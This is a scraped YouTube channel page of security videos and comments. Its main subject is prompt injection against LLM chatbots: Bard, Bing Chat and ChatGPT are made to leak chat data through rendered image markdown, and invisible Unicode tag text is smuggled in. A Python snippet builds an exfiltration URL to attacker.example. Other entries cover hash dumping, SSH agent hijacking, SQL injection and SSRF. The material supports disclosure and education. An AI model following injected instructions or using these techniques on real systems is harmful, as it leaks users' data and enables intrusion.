Embrace The Red
  • 34 videos
  • 675,923 views
ASCII Smuggling: Crafting Invisible Text and Decoding Hidden Secrets - New Threat for LLMs and beyond
This video provides a deep dive into ASCII Smuggling. It's possible to hide invisible text in plain sight using Unicode Tags Block code points. Some Large Language Models (LLMs) interpret such hidden text as instructions, and some are also able to craft such hidden text!
Additionally, this has implications beyond Machine Learning, AI and LLM applications, as it allows rendering of invisible text in plain sight.
Blog Post: embracethered.com/blog/posts/2024/hiding-and-finding-text-with-unicode-tags/
ASCII Smuggler: embracethered.com/blog/ascii-smuggler.html
777 views

Videos

Real-world exploits and mitigations in LLM applications (37c3)
20K views · 4 months ago
Video recording of my talk at the 37th Chaos Communication Congress in Hamburg titled "NEW IMPORTANT INSTRUCTIONS: Real-world exploits and mitigations in Large Language Model applications" about LLM app security and Prompt Injections specifically. A big thank you to the CCC organizers and all the volunteers for putting together such a great event! Source Video: media.ccc.de/v/37c3-12292-new_imp...
Hacking Google Bard: Prompt Injection to Data Exfiltration via Image Markdown Rendering (Demo Video)
5K views · 6 months ago
Demo video of the end-to-end data exfiltration exploit via a malicious Google Doc. The exploit leverages an indirect prompt injection which injects an image markdown element, which is the exfiltration channel. This vulnerability was responsibly disclosed to Google VRP on September 19th, 2023 and Google reported it as fixed on October 19th, 2023. Details in this blog post: embracethered.com/blog/posts/2...
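The injected image markdown element can be sketched in a few lines. This is a hedged illustration only: the attacker domain and query parameter name are invented for the demo, not taken from the actual exploit.

```python
# Illustration of the exfiltration channel: the injected instructions make
# the model emit a markdown image whose URL carries the chat data, so the
# client leaks it the moment it renders the image. Domain and parameter
# name below are made up.
from urllib.parse import quote

def exfil_markdown(chat_data, endpoint="https://attacker.example/logo.png"):
    """Build the markdown image element an injection would ask the LLM to emit."""
    return f"![logo]({endpoint}?q={quote(chat_data)})"

print(exfil_markdown("summary of the user's past chat"))
```

Rendering that markdown triggers an HTTP request to the attacker's server with the data in the query string, which is why blocking image rendering (or a Content Security Policy) mitigates this class of bug.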
Data Exfiltration Vulnerabilities in LLM Applications and Chatbots: Bing Chat, ChatGPT and Claude
1.3K views · 8 months ago
During an Indirect Prompt Injection attack, an adversary can inject malicious instructions to have a large language model (LLM) application (such as a chatbot) send data off to other servers on the Internet. In this video we discuss three techniques for data exfiltration, including proof-of-concepts I responsibly disclosed to OpenAI, Microsoft and Anthropic, a plugin vendor, and how the vendors...
Bing Chat - Data Exfiltration Exploit (responsibly disclosed to Microsoft and now fixed)
1.2K views · 10 months ago
This is the demo video I sent to Microsoft's Security Response Center when reporting the issue on April 8th, 2023. MSRC informed me on June 15th, 2023 that the vulnerability was fixed and hence can be disclosed publicly. Detailed Blog Post: embracethered.com/blog/posts/2023/bing-chat-data-exfiltration-poc-and-fix/
POC - ChatGPT Plugins: Indirect prompt injection leading to data exfiltration via images
3.9K views · 1 year ago
As predicted by security researchers, with the advent of plugins Indirect Prompt Injections are now a reality within ChatGPT’s ecosystem. Overview: User enters data 0:05 User asks ChatGPT to query the web 0:25 ChatGPT invokes the WebPilot Plugin 0:35 The Indirect Prompt Injection from the website succeeds 0:58 ChatGPT sent data to remote server 1:18 Accompanying blog post: embracethered.com/blo...
Adversarial Prompting - Tutorial + Lab
1.2K views · 1 year ago
Practical examples and try-it-yourself labs to help learn about and research Prompt Injections. Colab Notebook: colab.research.google.com/drive/1qGznuvmUj7dSQwS9A9L-M91jXwws-p7k The examples range from simple scenarios, such as changing the output message to a specific text, to more complex scenarios such as JSON object injection as well as HTML/XSS and also Data Exfiltration. Intro & Setup 0:0...
Prompt Injections - An Introduction
4.6K views · 1 year ago
Many courses teach prompt engineering, and currently pretty much all examples are vulnerable to Prompt Injections. Especially Indirect Prompt Injections are dangerous. They allow untrusted data to take control of the LLM (large language model) and give an AI new instructions, a new mission and objective. This video aims to raise awareness of this rising problem. Injections Lab: colab.research.google...
Decrypting SSL/TLS browser traffic with Wireshark (using netsh trace start)
9K views · 1 year ago
Walk-through on how to use the built-in Windows netsh tool to capture HTTPS browser network traffic, convert it using etl2pcapng, and then decrypt it with Wireshark. To do this we use SSLKEYLOGFILE and the netsh command line to create a network trace and TLS session keys. Sorry, the audio seems to have some hiccups - but hopefully not too bad. Microsoft's ETL to pcap conversion tool is here:...
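The decryption step hinges on the key log file Wireshark consumes. As a rough sanity check before loading it, a small script can verify the NSS key log format browsers write when SSLKEYLOGFILE is set. This helper is a sketch, not something from the video.

```python
# Sketch (not from the video): sanity-check an SSLKEYLOGFILE before
# handing it to Wireshark. Browsers write the NSS key log format:
# one "<LABEL> <client_random_hex> <secret_hex>" entry per line,
# with '#' comment lines allowed.
def parse_keylog(lines):
    entries = []
    for raw in lines:
        line = raw.strip()
        if not line or line.startswith("#"):
            continue  # comments and blank lines are allowed in the format
        parts = line.split()
        if len(parts) == 3:
            entries.append(dict(zip(("label", "client_random", "secret"), parts)))
    return entries

sample = [
    "# generated by the browser",
    "CLIENT_RANDOM " + "ab" * 32 + " " + "cd" * 48,
]
for entry in parse_keylog(sample):
    print(entry["label"], len(entry["client_random"]) // 2, "byte client random")
```

If the file parses into zero entries, the browser was likely started before the environment variable took effect, which is a common reason decryption fails.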
Simplify your life with ChatGPT API Shell Integration: Yolo your Bash + PowerShell Assistant (GPT-4)
9K views · 1 year ago
[Update]: The latest version of yolo now also supports gpt-4 (the default is gpt-3.5-turbo). Introducing yolo, the AI-powered Linux, macOS and Windows shell command assistant that takes your natural language instructions and harnesses the power of the ChatGPT API to translate the instructions into valid shell commands. Ever wondered what bash command to use for a certain task? Do you have issues remember...
Grabbing and cracking macOS password hashes (with dscl and hashcat)
6K views · 1 year ago
Let's look at the dscl utility on macOS that allows hackers to query directory services information, including extracting sensitive fields such as the password hash. An admin can extract the ShadowHashData and then attempt to crack the hash with a tool such as hashcat. This is a post-exploitation technique to be aware of as Red and Blue Teamers and build tests and detections for. As always: Pen...
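The final assembly step, turning the fields parsed out of ShadowHashData into something hashcat can consume, can be sketched as follows. This is a hedged sketch: mode 7100 is hashcat's macOS PBKDF2-SHA512 mode, and all field values below are dummies.

```python
# Sketch: join the iterations, salt, and entropy fields extracted from
# ShadowHashData into the "$ml$<iterations>$<salt_hex>$<entropy_hex>"
# string that hashcat mode 7100 (macOS v10.8+ PBKDF2-SHA512) expects.
# Values below are dummies, not a real hash.
def build_7100(iterations, salt_hex, entropy_hex):
    return f"$ml${iterations}${salt_hex}${entropy_hex}"

line = build_7100(49504, "aa" * 32, "bb" * 64)
print(line[:16] + "...")
# then crack with e.g.: hashcat -m 7100 hash.txt wordlist.txt
```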
SSH Agent Hijacking - Hacking technique for Linux and macOS explained
2.7K views · 1 year ago
SSH Agent Hijacking is a powerful post-exploitation technique that an adversary might use to leverage SSH private keys stored in an SSH Agent. This video explains at a high level how SSH Agent forwarding works, and what commands an attacker might perform to gain control of the SSH Agent of another user (using the SSH_AUTH_SOCK environment variable). For Blue Teamers this video will be useful...
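The first step of the technique, locating another user's agent socket, can be sketched like this. The socket path convention is the standard ssh-agent one; the example environment line in the comment is illustrative.

```python
# Sketch of the reconnaissance step: find candidate agent sockets.
# ssh-agent creates them under /tmp/ssh-XXXXXX/agent.<pid>; an attacker
# with sufficient privileges would then re-point their environment at
# one, e.g.:  SSH_AUTH_SOCK=/tmp/ssh-abc123/agent.4242 ssh-add -l
import glob

def find_agent_sockets(pattern="/tmp/ssh-*/agent.*"):
    """Return paths matching the conventional ssh-agent socket location."""
    return sorted(glob.glob(pattern))

print(find_agent_sockets())
```

Monitoring for processes accessing agent sockets they don't own is the corresponding detection idea for Blue Teams.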
How to extract NTLM Hashes from Wireshark Captures for cracking with Hashcat
7K views · 1 year ago
This video shows how to filter a network traffic capture (pcap) to identify Net-NTLMv2 hashes and then extract the relevant information to construct the correct format for cracking with Hashcat.
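The construction step can be sketched in a few lines. The layout below is the line format hashcat's NetNTLMv2 mode (-m 5600) documents; all field values are dummies for illustration.

```python
# Sketch of the final assembly: the fields pulled from the NTLMSSP
# messages in Wireshark (username, domain, server challenge, NTProofStr,
# and the remaining blob) are joined into the hashcat -m 5600 line
# format: USER::DOMAIN:server_challenge:ntproofstr:blob
def build_netntlmv2(user, domain, server_challenge, ntproofstr, blob):
    return f"{user}::{domain}:{server_challenge}:{ntproofstr}:{blob}"

line = build_netntlmv2("alice", "CORP", "11" * 8, "22" * 16,
                       "0101000000000000")
print(line)
```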
SQL Injection Attacks For Beginners (Basics)
1.1K views · 1 year ago
This video explains and demos the basics of an important application security vulnerability called SQL Injections and how database systems are attacked using this technique. It is a very common issue and also listed in the OWASP Top 10. At the end mitigations are also discussed. If you enjoy the video let me know in the comments and I will create another one with more advanced examples to help ...
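The core of the issue can be reproduced in a few lines. This sketch uses an in-memory SQLite database (table and column names invented for the demo) to contrast string concatenation with the parameterized-query mitigation discussed at the end.

```python
# Minimal demo of the vulnerability class: attacker input concatenated
# into SQL vs. passed as a parameter. Table/column names are made up.
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, secret TEXT)")
conn.execute("INSERT INTO users VALUES ('alice', 's3cret')")

evil = "' OR '1'='1"

# Vulnerable: the input becomes part of the SQL statement itself.
rows = conn.execute(
    f"SELECT secret FROM users WHERE name = '{evil}'").fetchall()
print(len(rows))  # 1 -- the injected OR clause matched every row

# Mitigation: a parameterized query treats the input as data, not SQL.
rows = conn.execute(
    "SELECT secret FROM users WHERE name = ?", (evil,)).fetchall()
print(len(rows))  # 0 -- no user is literally named "' OR '1'='1"
```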
Server-Side Request Forgery (SSRF) hacking variations you MUST KNOW about!
468 views · 1 year ago
This video covers the Server-Side Request Forgery (SSRF) vulnerability class, starting from a basic definition to understand the issue, through advanced variations you probably haven't seen before, including using it in combination with the Log4j vulnerability. The video also briefly describes how to mitigate/prevent the vulnerability from the developer's side. Learn the hacks, stop the ...
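The developer-side check can be sketched as follows: resolve the user-supplied URL's host and refuse private, loopback, and link-local destinations. This is a minimal illustration only; real defenses also need allow-lists and must re-check after every redirect.

```python
# Sketch of a basic SSRF guard: resolve the target host and reject
# internal address ranges before fetching. Not a complete defense.
import ipaddress
import socket
from urllib.parse import urlsplit

def is_internal(url):
    host = urlsplit(url).hostname
    addr = socket.getaddrinfo(host, None)[0][4][0]  # first resolved address
    ip = ipaddress.ip_address(addr)
    return ip.is_private or ip.is_loopback or ip.is_link_local

print(is_internal("http://127.0.0.1/admin"))       # True
print(is_internal("http://169.254.169.254/meta"))  # True (cloud metadata range)
```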
Dumping cleartext Wi-Fi passwords using netsh in Windows (netsh wlan show profiles)
1.4K views · 1 year ago
Two ChatGPT bots using unofficial API to play Tic-Tac-Toe autonomously against each other
801 views · 1 year ago
SameSite Cookies for Everyone - Cross Site Request Forgery Mitigations (follow up)
3.1K views · 1 year ago
ChatGPT - Imagine you are a Microsoft SQL Server database server
562K views · 1 year ago
ChatGPT - Commodore 64
1.1K views · 1 year ago
Understanding the basics of Cross-Site Request Forgery attacks
348 views · 1 year ago
Pass the Cookies and Pivot to the Clouds
254 views · 1 year ago
Hacking Machine Learning Systems (Red Team Edition) - AI Hacker
3.8K views · 2 years ago
Trailer: Learn how to hack neural networks, so that we don't get stuck in the matrix!
975 views · 2 years ago
Awakening Beethoven with Machine Learning
302 views · 3 years ago
Performing port-proxying and port-forwarding on Windows
7K views · 3 years ago
Image Scaling Attacks are CRAZY!!! Hiding images in plain sight (Machine Learning)
1.8K views · 3 years ago
What is Tabnabbing?
5K views · 3 years ago
What is Cross Site Scripting (XSS)?
475 views · 3 years ago
Web Application Security Fundamentals (must know basics for developers, testers and hackers)
6K views · 3 years ago

COMMENTS

  • @octopus3141
    @octopus3141 8 days ago

    Great stuff 👍

    • @embracethered
      @embracethered 7 days ago

      Thanks for the visit and note, appreciate it! Let me know if there are any relevant topics you'd like to see covered.

  • @Agathoz84
    @Agathoz84 9 days ago

    nice video bru

    • @embracethered
      @embracethered 9 days ago

      Thanks! Let me know if there are other topics of interest.

  • @user-or7kk7gh8u
    @user-or7kk7gh8u 23 days ago

    Can you please share the .py file you ran in this video to monitor the ChatGPT 3.5 chat (print-data-exfiltration-log.py)?

    • @embracethered
      @embracethered 23 days ago

      It was just a script that filters the web server log for requests from the ChatGPT user agent and only shows the query parameter, no request IP - so it's easier to view. You can just grep /var/log/nginx/access.log (assuming you use nginx on Linux). I can see if I still have the script somewhere, but it wasn't anything special.
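
For reference, a minimal reconstruction of such a filter might look like this. The original print-data-exfiltration-log.py wasn't published, so this is an assumption; the field positions assume nginx's default "combined" log format, and "ChatGPT-User" as a user-agent substring is also assumed.

```python
# Hedged reconstruction of a log filter like the one described above:
# keep only requests whose user agent mentions ChatGPT, and print just
# the query parameters (no client IP). Assumes nginx "combined" format.
from urllib.parse import parse_qs, urlsplit

def chatgpt_queries(log_lines):
    """Yield query parameters of requests from a ChatGPT user agent."""
    for line in log_lines:
        if "ChatGPT" not in line:
            continue
        # The request line sits in quotes: "GET /path?q=... HTTP/1.1"
        try:
            request = line.split('"')[1]
            path = request.split()[1]
        except IndexError:
            continue  # malformed line, skip it
        yield parse_qs(urlsplit(path).query)

sample = ['1.2.3.4 - - [x] "GET /exfil?q=hello HTTP/1.1" 200 0 "-" "ChatGPT-User/1.0"']
print(list(chatgpt_queries(sample)))
```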

  • @pez5491
    @pez5491 26 days ago

    Gold!

  • @maloseevanschaba7343
    @maloseevanschaba7343 1 month ago

    Perfect, straight to the point.

  • @Astranix59
    @Astranix59 1 month ago

    What wordlist file do you use?

    • @embracethered
      @embracethered 1 month ago

      It depends; a common source to get started is github.com/danielmiessler/SecLists. The mutations and rulesets being used also matter quite significantly, by the way.

    • @Astranix59
      @Astranix59 1 month ago

      @@embracethered thank you!!

  • @chitchatvn5208
    @chitchatvn5208 2 months ago

    Thanks. Great content!

  • @chitchatvn5208
    @chitchatvn5208 2 months ago

    Thanks Yohann.

  • @chitchatvn5208
    @chitchatvn5208 2 months ago

    Thanks Yohann.

    • @embracethered
      @embracethered 1 month ago

      Glad you found it interesting! Thanks for checking it out!

  • @chitchatvn5208
    @chitchatvn5208 2 months ago

    thanks Yohann.

    • @embracethered
      @embracethered 2 months ago

      Thank you! Hope it was useful! 🙂

  • @chitchatvn5208
    @chitchatvn5208 2 months ago

    Thanks Johann.

  • @6cylbmw
    @6cylbmw 2 months ago

    I didn't really understand the vulnerability impact. You are exfiltrating user A's own chat to user A's own drive. How is it exploitable?

    • @embracethered
      @embracethered 2 months ago

      The attacker causes the chatbot to send past chat data to the attacker's server (in this case a Google Doc captures the exfiltrated data). Check out the linked blog post; it explains it in detail.

  • @endone3661
    @endone3661 2 months ago

    what is this ?

    • @embracethered
      @embracethered 2 months ago

      It's about a Jupyter Notebook that lets you self-study prompt injection and experiment with the technique by solving a set of challenges.

  • @th3pac1fist
    @th3pac1fist 2 months ago

    🔥

    • @embracethered
      @embracethered 2 months ago

      Thanks!! It's probably one of my most interesting videos.

  • @RandomAccess2
    @RandomAccess2 2 months ago

    [Environment]::SetEnvironmentVariable("SSLKEYLOGFILE", "c:\temp\sslkeys\keys", "MACHINE")
    netsh trace start capture=yes tracefile=c:\temp\sslkeys\trace.etl report=disabled
    netsh trace stop

  • @notV3NOM
    @notV3NOM 2 months ago

    Thanks, great insights!

    • @embracethered
      @embracethered 2 months ago

      Thanks for watching! Glad it was interesting.

  • @erinclay4917
    @erinclay4917 3 months ago

    How'd you get that cool paint splash effect around your head? What software are you using?

    • @embracethered
      @embracethered 3 months ago

      Thanks! It's just a custom image I created: I drew a white circle on a black background, zigzagged the splash effect over it with a brush, and then used a filter on the webcam in OBS to blend it in.

  • @void-qy4ov
    @void-qy4ov 3 months ago

    Great tut. Thanks 👍

    • @embracethered
      @embracethered 3 months ago

      Glad it was helpful! Thanks for watching!

  • @Sway55
    @Sway55 3 months ago

    How do I do this for traffic outside of the browser? Say I have a desktop app.

  • @TheHologr4m
    @TheHologr4m 3 months ago

    Was not expecting this in the playlist.

  • @petraat8806
    @petraat8806 3 months ago

    I'm trying to understand what just happened, can someone please explain?

    • @embracethered
      @embracethered 3 months ago

      You can read up on the details here: embracethered.com/blog/posts/2023/google-bard-data-exfiltration/ And if you want to understand the big picture around LLM prompt injections, check out this talk: m.ua-cam.com/video/qyTSOSDEC5M/v-deo.html Thanks for watching!

  • @kajalpuri3404
    @kajalpuri3404 3 months ago

    Thank you so much. Exactly the video I needed.

  • @plaverty9
    @plaverty9 4 months ago

    I just tried this, but the only difference is I was capturing this information over HTTP instead of SMB. Does that make a difference? I ask because I was trying to generate a proof of concept where I controlled the username and password going in, but it wouldn't crack. I tried four different times and it didn't work. Is something different when these are captured over HTTP instead of an SMB connection?

    • @embracethered
      @embracethered 3 months ago

      Good question. My first thought is that it should just work the same, but I haven't tried it. Relaying definitely works; that I have done many times in the past.

    • @plaverty9
      @plaverty9 3 months ago

      Thanks. I had a colleague try it too, and got the same result as I did. This is for a pentest proof of concept, so I’m not in position to relay unfortunately.

  • @netor-3y4
    @netor-3y4 4 months ago

    ff

  • @347my455
    @347my455 4 months ago

    superb!

  • @Fitnessdealnews
    @Fitnessdealnews 4 months ago

    One of the best presentations I've seen

    • @embracethered
      @embracethered 4 months ago

      Thanks for watching! Really appreciate the feedback! 😀

  • @MohdAli-nz4yi
    @MohdAli-nz4yi 4 months ago

    I think a better conclusion is: never put information you need to keep private into the context of an LLM, because it will leak.

    • @embracethered
      @embracethered 4 months ago

      Thanks for watching and for the note. I think that misses the point that the LLM can attack the hosting app/user, so developers/users can't trust the responses. This includes confused deputy issues (in the app), such as automatic tool invocation.

    • @MohdAli-nz4yi
      @MohdAli-nz4yi 4 months ago

      @@embracethered Agreed! So 2 big points: 1. Never put info in LLM context you don't want to leak. 2. Never put untrusted input into LLM context, it's like executing arbitrary code you have downloaded from the internet on your machine. LLM inputs must always be trusted, because the LLM will "execute" it in "trusted mode".

    • @embracethered
      @embracethered 4 months ago

      @@MohdAli-nz4yi (1) I agree we shouldn't put sensitive information, like passwords, credit card numbers, or sensitive PII into chatbots. For (2), the challenge is that everyone wants to have an LLM operate over untrusted data. And that's the problem that hopefully one day will have a deterministic and secure solution. For now the best advice is to not trust the output, e.g. developers shouldn't blindly take the output and invoke other tools/plugins in agents or render output as HTML, and users shouldn't blindly trust the output because it can be a hallucination (or a backdoor), or attacker controlled via an indirect prompt injection. However, some use cases might be too risky to implement at all, and it's best to threat model implementations accordingly to understand the risks and implications.

  • @ludovicjacomme1804
    @ludovicjacomme1804 4 months ago

    Excellent presentation, thanks a lot for sharing, extremely informative.

    • @embracethered
      @embracethered 4 months ago

      Thanks for watching! Glad to hear it's informative! 🙂

  • @artemsemenov8136
    @artemsemenov8136 4 months ago

    Thank you, it's awesome!

    • @embracethered
      @embracethered 4 months ago

      Glad you like it!

    • @artemsemenov8136
      @artemsemenov8136 4 months ago

      @@embracethered I'm a fan of yours, I've talked about your research at cybersecurity conferences in Russia. You're awesome.

    • @embracethered
      @embracethered 4 months ago

      Thank you! 🙏

    • @artemsemenov8136
      @artemsemenov8136 4 months ago

      @@embracethered What do you think about LLM security scanners like garak and vigil? Also, have you encountered P2SQL injection in the real world?

  • @macklemo5968
    @macklemo5968 4 months ago

    🔥

  • @jlf_
    @jlf_ 4 months ago

    I really enjoyed your talk, Johann! Thank you!

    • @embracethered
      @embracethered 4 months ago

      Thanks for watching and glad you enjoyed it! 🙂

  • @ninosawas3568
    @ninosawas3568 5 months ago

    Great video! Very informative. Interesting to see how the LLM's ability to "pay attention" is such a large exploit. I wonder if mitigating this issue would lead to LLMs being overall less effective at following user instructions.

    • @embracethered
      @embracethered 5 months ago

      Thanks for watching! I believe you are correct, it's a double-edged sword. The best mitigation at the moment is to not trust the responses. Unfortunately it's hence impossible at the moment to build a rather generic autonomous agent that uses tools automatically. It's a real bummer, because I think most of us want secure and safe agents.

  • @isiltarexilium798
    @isiltarexilium798 5 months ago

    How can I use another host (such as neuroai.host) instead of OpenAI?

  • @madjack821
    @madjack821 6 months ago

    Is this blocked on some routers? I’ve tried this with my current network at the house and “key content” doesn’t show on the screen. I am running as administrator and previous networks are showing key content.

  • @mortenwormdue3593
    @mortenwormdue3593 6 months ago

    It only works if the traffic comes from the browser - in your example, Chrome provides the session keys. So, no - not really workable on a server.

  • @0q2628
    @0q2628 6 months ago

    love this idea :)

    • @embracethered
      @embracethered 6 months ago

      Thanks for watching! Yes, LLMs are awesome and fun to experiment with.

  • @owowhatsthis....3025
    @owowhatsthis....3025 6 months ago

    Thanks, helps a lot. From 🇩🇪

    • @embracethered
      @embracethered 6 months ago

      Glad it helped! Thanks for watching!

  • @balonikowaty
    @balonikowaty 6 months ago

    Great work Johann, as always! The more access we give to other data sources, including documents, the more we expose each other to indirect injection attacks. It is worth pointing out that the instructions could have been written in white ink at size 0.1, making the document look normal!

  • @fire17102
    @fire17102 6 months ago

    When does Bard decide to load and use a doc? Is it only when stated in the prompt? Or can we set up a file that will be implicitly called on every prompt? Something like AI_SAFETY_MANIFEST_-_MUST_BE_READ_ON_EVERY_USER_PROMPT.doc 😏

  • @fire17102
    @fire17102 6 months ago

    I read the post, really good. I guess these sorts of procedures will work across many different stacks and companies. Also, I wonder if you log your attempts; probably a lot of wisdom can be drawn from your first attempt evolving into the last. You got it on the 10th try. Maybe showing a smart LLM all 10 of those could find patterns, effectively creating a prompt optimizer that brings you faster results next time. All the best!

    • @embracethered
      @embracethered 6 months ago

      Thanks for the note! Yes, this is a very common flaw across LLM apps. Check out some of my other posts about Bing Chat, ChatGPT or Claude. Yep, on the iteration count - spot on. A lot of the initial tests were around basic validation that injection and reading of chat history worked, then the addition of image rendering, then in-context learning examples to increase the reliability of the exploit.

  • @LukmaansStack
    @LukmaansStack 6 months ago

    In the development environment the cookies are being set, but in the production environment they are not. What is the solution for this issue? Please help.

    • @embracethered
      @embracethered 6 months ago

      Thanks for watching! Seems like a developer question; it might be related to the domain or path properties of the cookies when they get set.

  • @user-nl4qz3ej1y
    @user-nl4qz3ej1y 7 months ago

    Hi, for SSH agent forwarding to work, the ssh-agent service must first be initiated on our local machine. However, I'm confused: does it work there as well? Upon reviewing the SSH source code, it is evident that SSH utilizes the "AF_UNIX" family to establish a connection to the ssh-agent socket.

    • @embracethered
      @embracethered 7 months ago

      Hello, thanks for watching. Hope it was interesting. I'm not sure I understand the question, but yeah, ssh-agent can also run locally or remotely.

  • @cedric60666
    @cedric60666 7 months ago

    Thanks for explaining this. I guess it would also work with "private" instances of ChatGPT or equivalent systems, as long as the user input is not sanitized ...

    • @embracethered
      @embracethered 7 months ago

      Thanks for watching. I'm not sure how private instances work (or what exactly they are), but presumably yes, unless they put a configurable Content Security Policy or some other fix in place to not allow images to render/connect.

  • @levinsdurai4350
    @levinsdurai4350 7 months ago

    Is it possible without a port on Windows, like on Mac and Ubuntu?

  • @aitboss85
    @aitboss85 8 months ago

    Can you please explain what the "saturn" you typed in the browser is? Is this a custom-defined protocol to connect to your machine? And how can I do the same? Thank you!

    • @embracethered
      @embracethered 8 months ago

      Hi there, thanks for watching. It's just the name of a web server; it's using the HTTP protocol. You can omit typing http(s):// in most browsers.

    • @aitboss85
      @aitboss85 8 months ago

      @@embracethered I still can't figure out how to do it 🥹

    • @bicks4436
      @bicks4436 24 days ago

      @aitboss85 The simplest way to do this without DNS is to just add the name you want (i.e. saturn) and the IP address to your hosts file. Of course, if this is a private IP it will only work on that network unless you have additional things set up.

  • @user-lh8fg4ou6i
    @user-lh8fg4ou6i 8 months ago

    Hi, I'm having an issue with the 'wordlist' section at the end. I don't have a wordlist file. How do I create one, or where can I find one?

    • @embracethered
      @embracethered 1 month ago

      Here are some good examples: github.com/danielmiessler/SecLists

  • @shaunakchattopadhyay6254
    @shaunakchattopadhyay6254 8 months ago

    Awesome poc. Thanks for sharing

    • @embracethered
      @embracethered 8 months ago

      Thanks for watching! 🙏 Glad you liked it!😀

  • @prokrastinator6648
    @prokrastinator6648 8 months ago

    Really very clear explanation, props for that!

  • @lolygagger5991
    @lolygagger5991 8 months ago

    Very cool, but one quick question: this vulnerability only works if the legit site links to a malicious site. Are there any real-world reasons why a developer might do this?

    • @embracethered
      @embracethered 8 months ago

      One scenario that comes to mind right away is that not all content on websites is controlled by the developer (links to, or allowing links to, user-generated content). Thanks for watching! 🙏